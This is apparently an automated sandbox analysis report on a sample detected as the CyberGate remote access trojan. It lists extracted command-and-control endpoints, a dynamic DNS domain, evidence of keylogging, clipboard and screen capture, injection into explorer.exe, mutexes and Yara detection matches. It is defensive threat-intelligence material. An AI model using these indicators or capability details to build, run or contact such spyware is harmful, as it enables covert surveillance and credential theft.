            Source: explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp Binary or memory string: [autorun]
            Source: explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp Binary or memory string: H[autorun]
            Source: explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp Binary or memory string: autorun.inf
            Source: explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp Binary or memory string: [autorun]
            Source: explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp Binary or memory string: H[autorun]
            Source: explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp Binary or memory string: autorun.inf
            Source: explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: [autorun]
            Source: explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: H[autorun]
            Source: explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp Binary or memory string: autorun.inf
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00405D04 FindFirstFileA,FindClose
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 4_2_00405D04 FindFirstFileA,FindClose
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 5_2_00405D04 FindFirstFileA,FindClose
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 9_2_00405D04 FindFirstFileA,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24016C78 FindFirstFileA,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240145F0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403D390 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240163E8 FindFirstFileA,GetLastError
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24016C77 FindFirstFileA,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24015FE2 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24015FE4 FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240409E4 FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2404092C GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA

            Networking:

            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor URLs: eduzao.ddns.net:7000
            Source: Malware configuration extractor URLs: eduzao.ddns.net:2020
            Source: Malware configuration extractor URLs: eduzao.ddns.net:2200
            Source: Malware configuration extractor URLs: eduzao.ddns.net:4400
            Uses dynamic DNS services
            Source: unknown DNS query: name: eduzao.ddns.net
            Source: unknown DNS traffic detected: queries for: eduzao.ddns.net
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000002.610418959.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.361040308.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Contains functionality to register a low level keyboard hook
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040BBF4 SetWindowsHookExA 0000000D,Function_0000B0B8,00400000,00000000
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403CDE0 OpenClipboard,GetClipboardData,DragQueryFile,DragQueryFile,CloseClipboard
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403CDE0 OpenClipboard,GetClipboardData,DragQueryFile,DragQueryFile,CloseClipboard
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24037464 GetDesktopWindow,GetDC,CreateCompatibleDC,GetClientRect,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040B0B8 GetKeyboardState,ToAscii
            Source: dqH3t8JU1x.exe, 00000001.00000002.529914221.000000000073A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2405038C GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState
            Source: Yara match File source: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000016.00000002.629145832.000000002406B000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.630397058.000000002406B000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.629304269.00000000240DB000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 2200, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 5908, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 4908, type: MEMORY
            Source: Yara match File source: 20.2.explorer.exe.24010000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 30.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.explorer.exe.24080000.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 22.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPE

            E-Banking Fraud:

            Yara detected CyberGate RAT
            Source: Yara match File source: 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: TEXTURAFIVEM.exe PID: 5432, type: MEMORY
            Source: Yara match File source: Process Memory Space: TEXTURAFIVEM.exe PID: 4024, type: MEMORY
            Source: Yara match File source: Process Memory Space: TEXTURAFIVEM.exe PID: 6984, type: MEMORY
            Source: Yara match File source: Process Memory Space: dqH3t8JU1x.exe PID: 6776, type: MEMORY
            Source: Yara match File source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)Show sources
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24015C1C OpenProcess,NtQueryInformationProcess,NtSetInformationProcess,CloseHandle,FindCloseChangeNotification
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403B690 NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403EAA0 SetPropA,GetPropA,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403C950 OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2401528E ExitWindowsEx
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe File created: C:\Windows\install\
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24056188
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2402F414
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_240334CC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24035C24
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2402FD44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24035970
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 24013480 appears 140 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 24015008 appears 56 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 240130DC appears 64 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 24013388 appears 37 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 2402562C appears 392 times
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: String function: 00401AE4 appears 37 times
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: String function: 00403610 appears 38 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00401E10 appears 60 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00401AC0 appears 81 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00403630 appears 33 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00401B58 appears 39 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00401898 appears 33 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00401AE4 appears 111 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: String function: 00403610 appears 114 times
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
Source: dqH3t8JU1x.exe Static PE information: Resource name: RT_ICON type: SVR2 pure executable (Amdahl-UTS) not stripped - version 428919424 (a file-type guess on the raw icon resource bytes, not a genuine UTS executable)
Source: TEXTURAFIVEM.exe.1.dr Static PE information: Resource name: RT_ICON type: SVR2 pure executable (Amdahl-UTS) not stripped - version 428919424 (same resource as the parent sample)
Source: dqH3t8JU1x.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
Source: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 20.2.explorer.exe.24010000.6.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
Source: 30.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 20.2.explorer.exe.24010000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
Source: 22.2.explorer.exe.24010000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 21.2.explorer.exe.24080000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 21.2.explorer.exe.24080000.3.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 22.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: 30.2.explorer.exe.24010000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/24@4/0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_24015B30 GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403C424 GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403CBE4 OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404460 FindResourceA,SizeofResource,LoadResource,LockResource,FreeResource
Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403C858 OpenSCManagerA,OpenServiceA,StartServiceA,ControlService,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\AppData\Roaming\logs.dat
Source: C:\Windows\install\TEXTURAFIVEM.exe Mutant created: \Sessions\1\BaseNamedObjects\_x_X_UPDATE_X_x_
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\***MUTEX***
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4908
Source: C:\Windows\install\TEXTURAFIVEM.exe Mutant created: \Sessions\1\BaseNamedObjects\_x_X_BLOCKMOUSE_X_x_
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\_x_X_PASSWORDLIST_X_x_
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1768
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5908
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5432
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe File created: C:\Users\user\AppData\Local\Temp\XX--XX--XX.txt
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 times, once per injected explorer.exe instance)
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts (6 times; these reads come from the WerFault crash-reporting processes, not from the RAT payload)
Source: dqH3t8JU1x.exe Virustotal: Detection: 90%
Source: dqH3t8JU1x.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe File read: C:\Users\user\Desktop\dqH3t8JU1x.exe
Source: unknown Process created: C:\Users\user\Desktop\dqH3t8JU1x.exe 'C:\Users\user\Desktop\dqH3t8JU1x.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
Source: C:\Windows\install\TEXTURAFIVEM.exe Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 1104
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 1104
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
